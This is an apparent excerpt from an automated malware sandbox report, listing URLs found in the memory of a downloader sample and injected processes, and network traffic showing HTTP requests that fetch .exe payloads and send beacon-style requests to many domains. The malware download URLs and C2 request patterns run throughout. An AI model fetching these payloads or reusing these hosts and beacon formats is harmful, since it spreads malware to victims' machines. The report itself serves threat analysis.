                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005696000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.mantap89.online/oqhk/?6V=S2m6rfkUSom5w0bkGZ9xxD5o
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.maxmoney.com/opencart/system/library/cache/.cache/loader.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mediafire.com/file_premium/7gpr756k2pb1skw/With_L1cense-key_%255Bpass-2024%255D.rar/file
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.movidoc.com.br/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.movidoc.com.br/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.movidoc.com.br/scarica/
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000014.00000002.2504473111.0000000007870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=viteview.com
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.neshuafoods.com/wp-content/Setup.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.neshuafoods.com/wp-content/ali.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.neshuafoods.com/wp-content/karem.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.palharesinformatica.com.br/down/newsales/adm_atu.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.palharesinformatica.com.br/down/nfe4/adm_atu.exe
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rarlab.com/rar/winrar-x32-611.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.saf-oil.ru/downloads/safmanager/safman_setup.exe
                    Source: raserver.exe, 00000014.00000002.2504473111.0000000007870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sunglassesninja.com/abtc8mhlbehqil.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/1/34fec500e907172f97bbd6338c9b6f4c/PaymentConfirmation-Kxpjsopl.b
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/11/c55277e544bcdcb40bd7e638895feedf/Hiatuqrnxvnbgaajgfrfvofncuhla
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/20/01d30b158e7edb241a72c03f93054c48/mine10-Hwdyoztq.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/23/df1d9bc0d6ee01cdda6eb1c9d1a9ebe5/Cdlfyqnjpnryjffmuvkpoubkyuajr
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/31/ca8d9d906f76a6c950c1f4a1ecdbbebc/Qvfaes-Hkxzfaej.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/32/9c2ba052b54959daafb16d155fd6259f/TT-PAYMENT-SLIP.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/36/c84826e53f475f5c282fbf42e49704ff/yours20-Cybunddd.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/48/850e77cf3181a942f56710d531df3321/olu2-Buakmtri.bmp
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/49/b9e91f98627cd178abc70bb640e5a761/PaymentConfirmation-Ujujxpuw.
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/54/eafe7ba691bbe87be3d558bbda02e28c/Proof-Of-Payment.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/55/3aaf30c5197afc426d8a54c0eab89f89/vbc-Cmwddmkj.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/59/eebc21bf39c442d2c4d5b017a5661d4e/992k-Fzayckqo.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/61/79f64208ae65f892db69e0f4134e0870/28thcrypted-Xwiabjho.bmp
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/71/8b62713c0b30c2e6cbc86dcf34931920/Proof-Of-Payment.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net/img/image/94/365c557dbb0fa37ee848c74b3f23fa8a/999-Pmmugalz.png
                    Source: explorer.exe, 0000000C.00000002.2538932049.0000000011A0F000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.vaskaworldairways.com/sy22/?if=0xwPlKBJmvJUqodgY9f
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xn----7sbhgfcdscaa3cdd6dq3e3dvf.xn--p1ai/static/software/T1_Net.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xz888.oss-cn-hangzhou.aliyuncs.com/5w/%E4%BA%94%E5%91%B3%E4%BC%A0%E5%A5%87.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yello9erylanguage.gromovananii199.repl.co/4XXR.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yogayoga.ie/sga/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zaofisa.net/down/File_pass1234.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zhengxinpeixun.oss-cn-qingdao.aliyuncs.com/0011b9cd240249c3aeb520ea1205eaf1.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zuriwave.com/dq/
                    Source: unknownDNS traffic detected: queries for: urlhaus.abuse.ch
                    Source: C:\Windows\explorer.exeCode function: 12_2_094B6F82 getaddrinfo,setsockopt,recv,12_2_094B6F82
                    Source: global trafficHTTP traffic detected: GET /attachments/1162840103530528921/1164891114868834355/setup.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1536/audiodgse.exe HTTP/1.1Host: 172.245.208.6Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /_errorpages/sbinzx.exe HTTP/1.1Host: china.dhabigroup.topConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /2310/autolog.exe HTTP/1.1Host: 141.98.10.13Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /oqhk/?6V=S2m6rfkUSom5w0bkGZ9xxD5o+ScyZaPz3fqcnXIby6Ndme1p43G3vYiQdT8rDv0c8KSAw7db6IjuGPJpWsJ9gDxBr4S/7homt1WO8KFegpTN&u0=k6nXc HTTP/1.1Host: www.mantap89.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                    Source: global trafficHTTP traffic detected: GET /4hc5/?r6=GXbDJDJhjTGXq&MTEHTJO=s9Ra+if2WlaNsoBK6FAVDIm3PM9kdSAO890q2GWpqr1TmLV8KIiXeSy1Z3RqZFGmH5Rhc9k1ZdI= HTTP/1.1Host: www.collibrishop.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /oqhk/?6V=N4ucd4g4l1dZ2qGadA3yayjj5u3ESNt6SQSADc8X19YTlucSrBjmSf7zwvJu/a5DZ1/80DLeZ1PEtM0wjKKWnTfPC795yaUROzhn9GILrSa2&u0=k6nXc HTTP/1.1Host: www.bradslinkard.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                    Source: global trafficHTTP traffic detected: GET /sy22/?if=0xwPlKBJmvJUqodgY9f+IWv5xvicy/R8pafAMB3XVbynRWwk7/Bvj4DEfhLDhKqwHFmlVA2z3A==&cb=VTR8Df4xbZcXrNY HTTP/1.1Host: www.vaskaworldairways.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /oqhk/?6V=ny2+kNq0TTwUQoTh8mQBrVAngc+0PTxrZEjYBUSORFlkl7yyw3wHXlGovow8WO37Vr88ppKpQ+Bv6MBkuYYtLk7bB4++eGl+uku8oyQSI/EA&u0=k6nXc HTTP/1.1Host: www.hotelunivers84.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                    Source: global trafficHTTP traffic detected: GET /4hc5/?MTEHTJO=245SFh8UPM+emiRbepq1WQd5insBsLuTd6ZIn28ambGSnd6jNl4HEv69lJWy4XCsbMyZfqZpfnM=&r6=GXbDJDJhjTGXq HTTP/1.1Host: www.lpqxmz.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /oqhk/?6V=ff4ZaO4z0LwhFY6o2Tprnc2t1tlpPMkCF+luNTd+hEDA5tqtaOX63X7O+AIRf6IHk6xgm8SxQEaPbON9tAl9OfQF6CYpwThvG2Fv3OrD3eTo&u0=k6nXc HTTP/1.1Host: www.lesresort.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                    Source: global trafficHTTP traffic detected: GET /sy22/?if=3SPsA2Tf94mqV9E1IvWjnvopZUchcaiATfn50pDV0DZ5J8a0fl4ILxGtqicvHDFESWm4a48lbA==&cb=VTR8Df4xbZcXrNY HTTP/1.1Host: www.kimgj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /sy22/?if=3SPsA2Tf94mqV9E1IvWjnvopZUchcaiATfn50pDV0DZ5J8a0fl4ILxGtqicvHDFESWm4a48lbA==&cb=VTR8Df4xbZcXrNY HTTP/1.1Host: www.kimgj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /4hc5/?r6=GXbDJDJhjTGXq&MTEHTJO=W/W+8rZCJQfv83X5eCtYm4GP2nwQEt1BrOeVIr8pBa3hcSl80fMsJcdXq0PVoYjeeMsKfkenNDs= HTTP/1.1Host: www.peakvitality.fitnessConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /oqhk/?6V=eG34oexJxfnLxzWvLTTQ7qFr48TbnjDIg0NkFT4wXzFcXqEyizbaVzFrb2B5+bp1qvr0Tg+9iBDFNPoMoXjN+kbT8PPzNP1VV1hbt36orJ99&u0=k6nXc HTTP/1.1Host: www.viteview.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                    Source: global trafficHTTP traffic detected: GET /4hc5/?MTEHTJO=0xuAZqoZxaytpPPw7QG2WMtYamztVFoql+VmrFv+pApcfkXOBXNNhM5EbinmjYLQWWA1X0ExQok=&r6=GXbDJDJhjTGXq HTTP/1.1Host: www.pathlightpropertiesmgt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /oqhk/?6V=/ThYvMNrvRucvt4W70xBtsykX8B68+NW1h5dNoGQzRAGxYBOFkp+vdn2/by2LtWOXngfeU5ueobaRb/EcZl4++jep22QDd65X5ZJyFMjPq1q&u0=k6nXc HTTP/1.1Host: www.dulcestipicos.madridAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                    Source: global trafficHTTP traffic detected: GET /_errorpages/davincizx.exe HTTP/1.1Host: fresh1.ironoreprod.topConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /fuza/foto1661.exe HTTP/1.1Host: 77.91.68.249Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /fuza/tus.exe HTTP/1.1Host: 77.91.68.249Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /201.exe HTTP/1.1Host: h171145.srv22.test-hf.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /oqhk/?6V=7reSW0LkqgN1RwZqN6CxsDEv/5Yp8k7QpN9VGUz5XmbOUIotZrctGlff0kfis4OAuUZY0rsDlpQbHYNFUIEE2OME+Uef91LzELJ3T2wZ6zvi&u0=k6nXc HTTP/1.1Host: www.yektakhodro.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                    Source: global trafficHTTP traffic detected: GET /satup/kung.exe HTTP/1.1Host: 103.39.124.209Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /S2210M/smss.exe HTTP/1.1Host: 103.72.68.128Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /_errorpages/sbin22zx.exe HTTP/1.1Host: china.dhabigroup.topConnection: Keep-Alive
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
